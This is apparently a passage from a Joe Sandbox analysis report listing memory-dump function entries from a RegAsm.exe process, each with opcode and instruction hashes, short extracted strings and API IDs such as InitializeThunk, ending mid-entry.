                                    • Opcode ID: 1d8feeef0126ffe8c63342afaba4558ed33c57e7ba78c596c66c7e0fa34e77c1
                                    • Instruction ID: 5e6aaad999615e2ac42fefb03cf1b536ced96fd12a8bf48793a25e995ad5db17
                                    • Opcode Fuzzy Hash: 1d8feeef0126ffe8c63342afaba4558ed33c57e7ba78c596c66c7e0fa34e77c1
                                    • Instruction Fuzzy Hash: BAF1E536A28215CFCB04CF68E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: bC
                                    • API String ID: 0-3681614764
                                    • Opcode ID: b154c6e34f79c6648591b9b450c448a67bbc93cb44fa5396b7d9856807c8a211
                                    • Instruction ID: a5988ab96186a7325d1362fbcccc642df08cbf2eaa279a3d6103cdc8c7b46e1e
                                    • Opcode Fuzzy Hash: b154c6e34f79c6648591b9b450c448a67bbc93cb44fa5396b7d9856807c8a211
                                    • Instruction Fuzzy Hash: B7F1F536A28215CFCB04CF68E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: jk
                                    • API String ID: 0-78326018
                                    • Opcode ID: 25ef1f9adb694a81f93120e111aa8eff1c89ad6ac93ee7fa2faf286b71ff90ec
                                    • Instruction ID: 68e7885be5d05e4a2cf040f704cbb8fa7a41bea7ef2f0d8a510bf149587bd7f9
                                    • Opcode Fuzzy Hash: 25ef1f9adb694a81f93120e111aa8eff1c89ad6ac93ee7fa2faf286b71ff90ec
                                    • Instruction Fuzzy Hash: DDE1033A618356CBC7188F38DC5126B73E2FF4A351F0AC87DE9818B2A0E779C9558754
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: bC
                                    • API String ID: 0-3681614764
                                    • Opcode ID: 10f45940bf441a6cd71f6e58040424d3e031c37bab43412074f48cf734061f8b
                                    • Instruction ID: 2fa55bda5e41fd724e566356672d144f9f42af162050902131bcbf15531586af
                                    • Opcode Fuzzy Hash: 10f45940bf441a6cd71f6e58040424d3e031c37bab43412074f48cf734061f8b
                                    • Instruction Fuzzy Hash: E9E1C376A28215CFCB08CF28E8905AAB7F2FF8E310F19857DD94697351D734A952CB84
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: {}
                                    • API String ID: 0-4269290415
                                    • Opcode ID: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                    • Instruction ID: 0af4e1219fe889d167e9da05173529857e0f89c87775fbd0e3160429af4db955
                                    • Opcode Fuzzy Hash: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                    • Instruction Fuzzy Hash: 82E101B5608340DFE724DF24E88176FB7B2FB85304F54893DE5859B2A2DB789805CB4A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: "
                                    • API String ID: 0-123907689
                                    • Opcode ID: f5bf1b62e76307cdd5fc82252a9a1afcae73f4398661cde8b6da05f895bcd9dc
                                    • Instruction ID: ccf2f4e9833933b2009195e793b8faf6d5d6e2cba860aec0098ae2c38f35b308
                                    • Opcode Fuzzy Hash: f5bf1b62e76307cdd5fc82252a9a1afcae73f4398661cde8b6da05f895bcd9dc
                                    • Instruction Fuzzy Hash: FDD11F72B083255FC714CE25A89076BB7DAAF84350F89892EECA987381D738DD15C7C6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID: /,-
                                    • API String ID: 2994545307-1700940157
                                    • Opcode ID: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
                                    • Instruction ID: 73ea5f1ed436ac76404857fefd2ddfa4c8367646346d3918638d2e9e73e3d7e7
                                    • Opcode Fuzzy Hash: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
                                    • Instruction Fuzzy Hash: 8EB18E717083014BD714DF25888163BF792EBCA314F14A92EF5D557392DB39EC068B9A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID: VtA
                                    • API String ID: 2994545307-3724035812
                                    • Opcode ID: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
                                    • Instruction ID: ed71193d6b2bdbbac52031f97d74cd30495a87e66650ae04c888d17f76a05038
                                    • Opcode Fuzzy Hash: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
                                    • Instruction Fuzzy Hash: 5DC139766083419FD714CF28D8817AFB7E2AB95310F09892EE4D5D7392C738D885C75A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: bC
                                    • API String ID: 0-3681614764
                                    • Opcode ID: 12f582ca5cb52f02cbb6c7a65b3a2962543ce7e68b8d395708436d5f2da692ba
                                    • Instruction ID: 4d20f92c875f40788edf4275f174b054e137e174bc84352c0492b1430194fbac
                                    • Opcode Fuzzy Hash: 12f582ca5cb52f02cbb6c7a65b3a2962543ce7e68b8d395708436d5f2da692ba
                                    • Instruction Fuzzy Hash: F3C1C176A28215CFCB08CF68E8905AAB7F2FF8E310F19897DD54597351C734A952CB84
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 9YB
                                    • API String ID: 0-659603884
                                    • Opcode ID: cc1449e27a0f5531b09e40fa76c2dd5bb8592e6f2d5bdd274fc9f48ccbd80c23
                                    • Instruction ID: 1cfe0ac6ad2819008f92b10fbbf01a1b5c50993105dc128c753fe97305f097ae
                                    • Opcode Fuzzy Hash: cc1449e27a0f5531b09e40fa76c2dd5bb8592e6f2d5bdd274fc9f48ccbd80c23
                                    • Instruction Fuzzy Hash: 80B1077AA00215CBDB18CFA9D8916BFB7B2FF89310F58816DD442AB355DB395C42CB84
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: .
                                    • API String ID: 0-248832578
                                    • Opcode ID: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
                                    • Instruction ID: 2823e07fbbb50db066b2c442ced4ae8f01fbddd957871d70742adaa2677f6ced
                                    • Opcode Fuzzy Hash: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
                                    • Instruction Fuzzy Hash: FE912A71E082524BC721CE29CA8025BB7E5AB81350F198A7ED8D5E73D1EA39DD414BC5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0
                                    • API String ID: 0-4108050209
                                    • Opcode ID: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                    • Instruction ID: 9f054d13e7867a4d77ca7132c07c00ca598ea50f9319f8eda39875565fe9693e
                                    • Opcode Fuzzy Hash: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                    • Instruction Fuzzy Hash: AD914827759A8007D31C9E3D5C622A7BA834BEB330F2DD37EA5B1CB3E5D56888064359
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ,
                                    • API String ID: 0-3772416878
                                    • Opcode ID: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                    • Instruction ID: 72525c85f477075dffe7e14f80d8e4d34094ebf61648e765f9981e94dfd3314a
                                    • Opcode Fuzzy Hash: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                    • Instruction Fuzzy Hash: 88B137711087859FC321DF18C88061BFBE0AFA9704F444A2EF5D997782D675E918CB67
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: "
                                    • API String ID: 0-123907689
                                    • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                    • Instruction ID: 33b1f2780e14060464d7ed180fcf8b3e4403934f6fcecc96c03af05ff21b71f5
                                    • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                    • Instruction Fuzzy Hash: 4A71D732B083358BD714CE28E48432FB7E2EBC5750FA9856EE89497351D7389C4587CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: klm
                                    • API String ID: 0-3800403225
                                    • Opcode ID: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
                                    • Instruction ID: fbab8d391cb70804594fb2969dbf4b57704b04da195ac2ac4d1ccbe35a174314
                                    • Opcode Fuzzy Hash: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
                                    • Instruction Fuzzy Hash: 9751F3B4A0D3508BD314EF25D81276BB7F2EFA6348F18856EE4D54B391E7398501CB1A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: pF
                                    • API String ID: 0-4112324664
                                    • Opcode ID: fe2049b3d9abf6bd8e08d2fec2b5cc8118d281e5b2e668e1a48ceb0649ab8eab
                                    • Instruction ID: 4b15e4364feff8b1cae5d4f97873799dd65533a9f2e3c3f3723fc524ea0f092f
                                    • Opcode Fuzzy Hash: fe2049b3d9abf6bd8e08d2fec2b5cc8118d281e5b2e668e1a48ceb0649ab8eab
                                    • Instruction Fuzzy Hash: 6651C572E442698BDB28CF68D8513DEB7B2FB84304F1581BEC55AEB384CB3449468F81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID: ?^A
                                    • API String ID: 2994545307-4120214115
                                    • Opcode ID: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
                                    • Instruction ID: 9ee6d34e9011fc7addbd5ae762574014bc539ca284b22a695acd6cfcc742d02e
                                    • Opcode Fuzzy Hash: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
                                    • Instruction Fuzzy Hash: 2141783A648300DFE3248B94D880ABBBBA3B7D5310F5D552EC5C527222CB745C81878F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 6B
                                    • API String ID: 0-4127139157
                                    • Opcode ID: e4ae7821e595edd76aaa032931955796ee87cd6bb1a1de6a8bf0ae27a5d1bb00
                                    • Instruction ID: 96ac195b9b02395a12e3507be26d084a31814086cf7b4e33e8fc611c97ddc8d1
                                    • Opcode Fuzzy Hash: e4ae7821e595edd76aaa032931955796ee87cd6bb1a1de6a8bf0ae27a5d1bb00
                                    • Instruction Fuzzy Hash: 90416A79A05102CFE708CF68EC917A9B3B2FF8A311F5A45B8D545E7390CB74A951CB48
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $%
                                    • API String ID: 0-4214564638
                                    • Opcode ID: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
                                    • Instruction ID: 3a12058a654eb28ab9a6ec9325260f0da8ac6e7581b620ea067b04d8af41a39e
                                    • Opcode Fuzzy Hash: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
                                    • Instruction Fuzzy Hash: 694124B0E022298BCB10CF99E8513AEB7B1FF55310F09825DE441AB790E7785941CB64
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: o`
                                    • API String ID: 0-3993896143
                                    • Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                    • Instruction ID: 0bdba0f6bf2b5cd18ae264ba298f37260da84434396a298b3053f459174327b1
                                    • Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                    • Instruction Fuzzy Hash: 9C11C270218340AFC310DF65DDC1B6BBFE2DBC2204F65983DE185A72A1C675E9499719
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0417c610e5770e3de08e3f27a6132ce354b413bedc9eba632381f23ebbae40da
                                    • Instruction ID: 1dcbf6391fd41f0c0a817e27e8bafbe762063cd3c7318eef4161125519cd5594
                                    • Opcode Fuzzy Hash: 0417c610e5770e3de08e3f27a6132ce354b413bedc9eba632381f23ebbae40da
                                    • Instruction Fuzzy Hash: 57424876A083518BD724CF29C8917ABB7E2EFC5310F19892EE4C597351DB38D845CB8A
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 42edef53a1db2b3de2c06a60c4f32876a63e42617b2c0b108f141745477d7c97
                                    • Instruction ID: 46ead43bd988ad5b99a16a21c2ab1060e4939541d0428d2c05e05470f57672f5
                                    • Opcode Fuzzy Hash: 42edef53a1db2b3de2c06a60c4f32876a63e42617b2c0b108f141745477d7c97
                                    • Instruction Fuzzy Hash: 2C52E1715083458FCB14CF18C0806AABFE1FF89305F18897EE8996B391D778E949CB89
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dbc0620a8ce2ba57e9d910984acef19c89c6c78f1b9d7e948e49654559093e9b
                                    • Instruction ID: 42a8754500a030df467a19eb208a6b75f213c456a02a9d9f5179d7aa03d033db
                                    • Opcode Fuzzy Hash: dbc0620a8ce2ba57e9d910984acef19c89c6c78f1b9d7e948e49654559093e9b
                                    • Instruction Fuzzy Hash: B952E3B0A08B949FE730CB24C4843A7BBE1AB91314F15483FD5D756BC2C27DB9958B0A
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
                                    • Instruction ID: 7b72874d185f9504f09fa30b763c2e13130ca022e31a023e0d3144396e745bed
                                    • Opcode Fuzzy Hash: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
                                    • Instruction Fuzzy Hash: 1012A372A0C7118BD725DE18D8806ABB3E1BFC4315F19893ED986A7385D738B8518B87
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c09ab01705470a57d5ac0deba44fab8d122be945ed84d36d91023274058ae07e
                                    • Instruction ID: 819cfa75d40707277b7651a3d059055683ccfe715dfab14305db8651ec0ec7a0
                                    • Opcode Fuzzy Hash: c09ab01705470a57d5ac0deba44fab8d122be945ed84d36d91023274058ae07e
                                    • Instruction Fuzzy Hash: 8C32E6B5A04B408FD714DF38C5953AABBE1AF45310F188A3ED5EB873D2E638A445CB06
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d327358085ba1a993c9adccc0f3e0ff780f208ec349b024e73061d52e6553d9c
                                    • Instruction ID: 1c03f4d1d9da4e588b7eb0090f71902aa376377d07fc1d7850242e2290c7d787
                                    • Opcode Fuzzy Hash: d327358085ba1a993c9adccc0f3e0ff780f208ec349b024e73061d52e6553d9c
                                    • Instruction Fuzzy Hash: 02322470914B118FC328CF29C68052ABBF5BF85711B604A2ED697A7F90D73AF945CB18
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
                                    • Instruction ID: ba4386b7c12eba82c1b0c1a845e92ae21c1426ac82d7aa641ba094e7d1c8bfda
                                    • Opcode Fuzzy Hash: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
                                    • Instruction Fuzzy Hash: FE021671A083128BC724CF28C4A16ABB7F1EFE5350F19852DE8C99B351E7389D85C786
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2253fead0949c94e28b23ae243de764efe372f7ce01ce19a162629ea64ece33e
                                    • Instruction ID: 8cc232c379ab24ad0e8e110b9e0577a2d66b898ca13c535210c4519ca42de900
                                    • Opcode Fuzzy Hash: 2253fead0949c94e28b23ae243de764efe372f7ce01ce19a162629ea64ece33e
                                    • Instruction Fuzzy Hash: ACF12771E003258BCF24CF58C8516ABB7B2FF95314F198199D896AF355E7389C41CB94
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
                                    • Instruction ID: bb9b723667839a33c3fd076cb6daf547bf5b8942c047ca41cb9a19f1e1e822b5
                                    • Opcode Fuzzy Hash: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
                                    • Instruction Fuzzy Hash: A3F1CC356087418FD724CF29C88066BFBE2EFD9300F08882EE5D597391E679E944CB96
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 192639fd68e41961d56c7569aed4b7f81ce7132f9cadfac3666f8de3caf69050
                                    • Instruction ID: 6af0af9fd07dbea0327a8a302486079f3e258e751aa577ffaaa1b30c4ee5c47c
                                    • Opcode Fuzzy Hash: 192639fd68e41961d56c7569aed4b7f81ce7132f9cadfac3666f8de3caf69050
                                    • Instruction Fuzzy Hash: 5B129D61608BC28ED315CA3C8848756BFD16BA6228F1CC79DD0F94B3D3C27A9546C7A2
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
                                    • Instruction ID: 473c7c0e01890161c42436878ad5ddc7d20691f55e5b146572409273c410520a
                                    • Opcode Fuzzy Hash: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
                                    • Instruction Fuzzy Hash: CAD1F575609700DBD3209F15D8417EBB3A5FFD6354F184A6EE8C98B391EB389840C79A
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: acc099de19a44bf00ce16e18c4be42564cbb2e2978226dbcdc14d31531569d8c
                                    • Instruction ID: 0d04b2c2fa50837e9638c4fbed55210e4b06bf37a5b46dbaee5e4e245b9bea77
                                    • Opcode Fuzzy Hash: acc099de19a44bf00ce16e18c4be42564cbb2e2978226dbcdc14d31531569d8c
                                    • Instruction Fuzzy Hash: 91B15C717043614BEB18DF24E85266B77A2EB81304F5AC53EE8859B386D63CDC09C79A
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 918cd65cbadabd6da86d83a30b2b2da0488193a68d8c3fca759c00fcea01beb3
                                    • Instruction ID: c845803a38f6c77acddbfa9eef1216980ece3764384c33bb2f9187d8778c445e
                                    • Opcode Fuzzy Hash: 918cd65cbadabd6da86d83a30b2b2da0488193a68d8c3fca759c00fcea01beb3
                                    • Instruction Fuzzy Hash: 2BF1C0F0904B40AFC3A5CF3AC942797BEECEB0A360F14491EF5AEC2241D73561458BA6
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 455de48da1b395ee01d158247e6300201ea3688789ea299f7cc6c50f6c6940d8
                                    • Instruction ID: 41c3e091da67547de47b3906f8a28cdcf4f9a35dde57214a1a091a27875e02c3
                                    • Opcode Fuzzy Hash: 455de48da1b395ee01d158247e6300201ea3688789ea299f7cc6c50f6c6940d8
                                    • Instruction Fuzzy Hash: F0024861508BC18ED3268B3C8848A56BFD26BA6224F0DC79DD4E94F7E3C279D506C762
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 53eb30f04210c5aa1d7ea8e5a987f3c65e47ecdc85497fc231301112acc4fb82
                                    • Instruction ID: 8f62d820d698011493e9b4d33d56c28701bf8a730f1a894cccb9041d930e3295
                                    • Opcode Fuzzy Hash: 53eb30f04210c5aa1d7ea8e5a987f3c65e47ecdc85497fc231301112acc4fb82
                                    • Instruction Fuzzy Hash: A4B148B5E00565CFCF10CF59E8417AEB7B1AF0A304F5A407AD899AB342D7399D01CBA9
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 78baf6bead69bc787f6e498b6209c58df4768a7a1f3029cd250c3ec1940b1aee
                                    • Instruction ID: 3d8e549ead381eb5a41ee94ce64dad1362128fe91ea456cb5e2966e39e4c66ca
                                    • Opcode Fuzzy Hash: 78baf6bead69bc787f6e498b6209c58df4768a7a1f3029cd250c3ec1940b1aee
                                    • Instruction Fuzzy Hash: A3B12536A083129BC724CF28C88056BB7E2FF99700F19953DEA8697366E735DC06D785
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 98cb35be4dcf6147bb54d841e08aa9a7e406920ae8f199def00657b733b42f8a
